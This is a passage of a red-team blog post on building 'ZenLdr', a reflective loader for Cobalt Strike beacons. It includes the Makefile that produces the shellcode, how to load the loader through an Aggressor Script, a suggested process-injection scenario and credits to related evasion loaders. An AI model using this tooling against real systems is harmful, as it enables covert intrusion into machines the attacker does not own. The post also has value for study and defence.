BINX64	:= ZenLdr.x64.bin

all:
	@ echo [+] Compiling ZenLdr
	@ nasm -f win64 asm/Start.asm -o Start.x64.o
	@ nasm -f win64 asm/GetIp.asm -o GetIp.x64.o
	@ $(CC_X64) *.c Start.x64.o GetIp.x64.o -o $(OUTX64) $(CFLAGS) $(LFLAGS) -I.
	@ echo [+] Extracting .text section into $(BINX64)
	@ python3 python3/extract.py -f $(OUTX64) -o $(BINX64)

clean:
	@ rm -rf *.o
	@ rm -rf *.bin
	@ rm -rf *.exe
```

## Execution

Now we're in the end game :p. In order to load our binary into **CS** we'll need an [Aggressor Script](https://download.cobaltstrike.com/aggressor-script/index.html). We'll need to use the [BEACON\_RDLL\_GENERATE](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_hooks.htm#BEACON_RDLL_GENERATE) function to implement our **UDRL** in **CS**.

There're plenty of ways this payload can be delivered but one scencario could be you already have a beacon on your target machine and you want to inject into another process your target is running.

It should be noted I'm using ***CS 4.7.2***. In version ***4.6*** it was apparently possible to make an **.exe** beacon to execute the shellcode (demonstrated on ***KaynStrike*** github) directly but that doesn't work in ***4.7*** for some reason (my assembly and debugging skills aren't good enough to figure out why either lol). Also, as of the time writing this I believe **CS** is now on verison ***4.8***, which I have not tested on.

The Windows version for the target machine was **10.0.19045**.

Below is a demonstation.

<figure><img src="https://2025655796-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MaxwVTT_BnxzQrp_qMJ%2Fuploads%2FxM0GbmBatwkZ3MYnNEin%2FZenLdr.gif?alt=media&#x26;token=f0fa346e-6aa1-4e1d-8390-7267048afb14" alt=""><figcaption><p>Apologies for crappy resolution! </p></figcaption></figure>

## Conclusion

So there you have it! A working proof of concept **UDRL**. It must be noted that my **PoC** is barebones, there's so much functionality that can be added to it but the point of this exercise was just to understand the process behind making one. Recently a security researcher and red teamer **Kyle Avery** made [**AceLdr**](https://github.com/kyleavery/AceLdr). This UDRL evades memory scanning using techniques like ***Return Address Spoofing***. Definitely check out the [blog post](https://kyleavery.com/posts/avoiding-memory-scanners) a [Youtube video](https://www.youtube.com/watch?v=edIMUcxCueA\&t=2343s\&ab_channel=DEFCONConference)!

There's still a lot more for me to understand regarding **UDRLs** but I hope this blog has at least made somethings clearer...if not, sorry for wasting your time :p!

If you've got this far and feel there's something that could be explained better, please let me know :)

Link to the code if you're interested - <https://github.com/Mav3rick33/ZenLdr>

## Credits

Austin Hudson - ***TitanLdr*** (The original **UDRL** which all others have built their **PoC's** from)

C5pider - [***KaynStrike***](https://github.com/Cracked5pider/KaynStrike) (Another UDRL implementation taking inspiration from ***TitanLdr***)

Modexp - Cool security researcher and developer should definitely check out his [blog](https://modexp.wordpress.com/)

Hasherezade - Another cool security researcher and developer check out her [blog](https://hasherezade.github.io/)

Matt Graeber - [Writing Optimized Windows Shellcode in C](https://web.archive.org/web/20201202085848/http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html) (One of the earliest documentations of writing shellcode in C)

Cobalt Strike - [User Defined Reflective Loader](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/malleable-c2-extend_user-defined-rdll.htm?cshid=1054) documentation

ReactOS - cool [website](https://doxygen.reactos.org/index.html) that has a lot of info regarding Undocumented Windows APIs

C Compilation - Concise [video](https://www.youtube.com/watch?v=VDslRumKvRA\&ab_channel=HowTo) about how C code compiles

Tmxlab - (Original language is Korean)

* <https://rninche01.tistory.com/entry/Reflective-DLL-Injection>
* <https://rninche01.tistory.com/entry/Universal-Shell-codex86%EC%9B%90%EB%A6%AC-%EB%B0%8F-%EC%8B%A4%EC%8A%B5?category=838537>

Donut - <https://github.com/TheWover/donut/tree/dafea1702ce2e71d5139c4d583627f7ee740f3ae> (Shellcode loader partly developed by **Modexp**)

PIC Your Malware - A cool Youtube [video](https://www.youtube.com/watch?v=8UCBvvJZw2U\&ab_channel=BruCONSecurityConference) on position independent code

Understanding Windows x64 Assesmbly - Great [tutorial](https://sonictk.github.io/asm_tutorial/) for understanding x64 Assembly

Reflective DLL Injection explained - A good [video](https://www.youtube.com/watch?v=IX0qUTbXNog\&ab_channel=QNAL) I found explaining **RDI**<br>

Memory Based Library Loading Someone Did That Already - Great [video](https://www.youtube.com/watch?v=RJrxue6LnwE\&t=1613s\&ab_channel=AdrianCrenshaw) about the concept of **MM** and how it's been around since the 90's<br>

Life Of Binaries - The **BEST** overview of the Portable Executable, referenced these [videos](https://www.youtube.com/playlist?list=PLUFkSN0XLZ-n_Na6jwqopTt1Ki57vMIc3) tons of times to better my understanding
